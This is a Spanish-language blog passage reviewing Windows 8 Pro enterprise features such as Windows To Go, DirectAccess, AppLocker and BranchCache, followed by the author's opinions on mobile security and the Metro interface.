  • Windows 8 está diseñado para dar respuesta a una de las demandas de las empresas actuales, la movilidad. Por eso es importante la llegada de la opción Windows To Go, una solución para llevar Windows 8 Instalado en una llaveUSB. De esta manera tenemos claro que la seguridad de los trabajadores en movilidad ya no depende del equipos desde el que se conecten, sino que se les proporciona un entorno seguro de trabajo a través de Windows To Go. Pero también para aquellos que quieren utilizar sus propios equipos en el trabajo.
  • Siguiendo con el tema de la seguridad desde ubicaciones remotas otra solución interesante que viene de la mano de Windows 8 Pro es DirectAcces, permite a los usuarios remotos acceso a los recursos dentro de una red corporativa sin tener que iniciar una VPN. A la vez permite a los administradores IT mantener a los equipos con las políticas de seguridad actualizadas, así como las actualizaciones de software de dichos equipos.
  • AppLocker permite a los administradores de sistemas bloquear el uso de aplicaciones y archivos en función de determinadas políticas de seguridad.

Otras mejoras de Windows 8 Pro

  • Virtualización puesto que ha introducido mejoras mejoras en Microsoft RemoteFX y Windows Server 2012, para permitir a los usuarios tener una experiencia de escritorio con la posibilidad de reproducir gráficos 3D, usar los periféricos USB y dispositivos conectados a través de la red ya sea LAN oWAN para escenarios de VDI.
  • BrandCache es una característica que permite mantener en la memoria caché contenidos que quedan almacenados en la memoria del servidor local y no tienen que descargarse continuamente del servidor central. De esta forma se gestiona mejor el ancho de banda y se agiliza el trabajo. Es una característica que se implementa junto con Windows Server 2012.
  • Metro para todos puesto que al unirse al dominio tanto tabletas táctiles como equipos de sobremesa o portátiles podrán utilizar las aplicaciones con la interfaz Metro. Esto ayudará a ser productivos tanto de forma táctil, como trabajando con un touchpad o un ratón.
De todas las novedades presentadas, las más interesantes me parecen las mejoras para permitir el trabajo en movilidad con las debidas medidas de seguridad. De esta forma se evita comprometer la seguridad de la empresa. Ahora no importará si nos conectamos desde casa, desde el ordenador de casa de un cliente o nuestro propio equipo. Igualmente poder aplicar las políticas de seguridad de las que la empresa lleva años haciendo uso es algo que para muchas es fundamental.
Por otro lado, donde tengo mis dudas es en el uso de la interfaz metro con ratón o un touchpad y un teclado. Lo cierto es que la rapidez que ganamos al saber donde está cada cosa, sin tener cambios de interfaz puede ser beneficioso para la productividad, pero a la vez esta se resentirá durante el tiempo que dure nuestra adaptación a la nueva interfaz.